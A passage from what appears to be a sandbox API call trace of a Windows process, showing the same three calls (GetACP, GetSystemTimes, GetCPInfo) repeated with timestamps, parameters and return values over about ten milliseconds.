GetACP () returned 0x4e4 [0111.284] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.284] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.284] GetACP () returned 0x4e4 [0111.284] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.284] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.284] GetACP () returned 0x4e4 [0111.284] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.284] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.284] GetACP () returned 0x4e4 [0111.284] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.284] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.284] GetACP () returned 0x4e4 [0111.284] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.284] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.284] GetACP () returned 0x4e4 [0111.284] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.285] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.285] GetACP () returned 0x4e4 [0111.285] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.285] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.285] GetACP () returned 0x4e4 [0111.285] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.285] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.285] GetACP () returned 0x4e4 [0111.285] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.285] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.285] GetACP () returned 0x4e4 [0111.285] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.285] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.285] GetACP () returned 0x4e4 [0111.285] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.285] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.285] GetACP () returned 0x4e4 [0111.285] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.286] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.286] GetACP () returned 0x4e4 [0111.286] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.286] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.286] GetACP () returned 0x4e4 [0111.286] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.286] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.286] GetACP () returned 0x4e4 [0111.286] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.286] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.286] GetACP () returned 0x4e4 [0111.286] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.287] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.287] GetACP () returned 0x4e4 [0111.287] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.287] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.287] GetACP () returned 0x4e4 [0111.287] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.287] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.287] GetACP () returned 0x4e4 [0111.287] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.287] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.287] GetACP () returned 0x4e4 [0111.287] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.287] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.287] GetACP () returned 0x4e4 [0111.287] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.287] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.287] GetACP () returned 0x4e4 [0111.287] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.287] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.287] GetACP () returned 0x4e4 [0111.287] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.288] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.288] GetACP () returned 0x4e4 [0111.288] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.288] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.288] GetACP () returned 0x4e4 [0111.288] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.288] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.288] GetACP () returned 0x4e4 [0111.288] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.288] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.288] GetACP () returned 0x4e4 [0111.288] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.288] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.288] GetACP () returned 0x4e4 [0111.288] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.288] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.288] GetACP () returned 0x4e4 [0111.288] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.288] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.288] GetACP () returned 0x4e4 [0111.288] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.289] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.289] GetACP () returned 0x4e4 [0111.289] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.289] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.289] GetACP () returned 0x4e4 [0111.289] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.289] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.289] GetACP () returned 0x4e4 [0111.289] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.289] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.289] GetACP () returned 0x4e4 [0111.289] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.289] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.289] GetACP () returned 0x4e4 [0111.289] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.289] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.289] GetACP () returned 0x4e4 [0111.289] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.289] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.290] GetACP () returned 0x4e4 [0111.290] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.290] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.290] GetACP () returned 0x4e4 [0111.290] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.290] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.290] GetACP () returned 0x4e4 [0111.290] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.290] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.290] GetACP () returned 0x4e4 [0111.290] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.290] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.290] GetACP () returned 0x4e4 [0111.290] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.290] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.290] GetACP () returned 0x4e4 [0111.290] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.290] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.290] GetACP () returned 0x4e4 [0111.290] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.291] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.291] GetACP () returned 0x4e4 [0111.291] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.291] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.291] GetACP () returned 0x4e4 [0111.291] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.291] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.291] GetACP () returned 0x4e4 [0111.291] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.291] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.291] GetACP () returned 0x4e4 [0111.291] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.291] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.291] GetACP () returned 0x4e4 [0111.291] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.291] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.291] GetACP () returned 0x4e4 [0111.291] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.291] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.291] GetACP () returned 0x4e4 [0111.291] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.292] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.292] GetACP () returned 0x4e4 [0111.292] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.292] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.292] GetACP () returned 0x4e4 [0111.292] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.292] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.292] GetACP () returned 0x4e4 [0111.292] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.292] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.292] GetACP () returned 0x4e4 [0111.292] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.292] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.292] GetACP () returned 0x4e4 [0111.292] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.292] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.292] GetACP () returned 0x4e4 [0111.292] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.292] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.292] GetACP () returned 0x4e4 [0111.292] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.293] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.293] GetACP () returned 0x4e4 [0111.293] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.293] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.293] GetACP () returned 0x4e4 [0111.293] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.293] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.293] GetACP () returned 0x4e4 [0111.293] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.293] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.293] GetACP () returned 0x4e4 [0111.293] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.293] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.293] GetACP () returned 0x4e4 [0111.293] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.293] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.293] GetACP () returned 0x4e4 [0111.293] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.294] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.294] GetACP () returned 0x4e4 [0111.294] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.294] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.294] GetACP () returned 0x4e4 [0111.294] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.294] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.294] GetACP () returned 0x4e4 [0111.294] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.294] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.294] GetACP () returned 0x4e4 [0111.294] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.294] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.294] GetACP () returned 0x4e4 [0111.294] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.294] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.294] GetACP () returned 0x4e4 [0111.294] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.294] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.294] GetACP () returned 0x4e4 [0111.294] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.295] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.295] GetACP () returned 0x4e4 [0111.295] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.295] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.295] GetACP () returned 0x4e4 [0111.295] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.295] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.295] GetACP () returned 0x4e4 [0111.295] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.295] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.295] GetACP () returned 0x4e4 [0111.295] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.295] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.295] GetACP () returned 0x4e4 [0111.295] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.295] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.295] GetACP () returned 0x4e4 [0111.295] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.295] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.295] GetACP () returned 0x4e4 [0111.295] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, 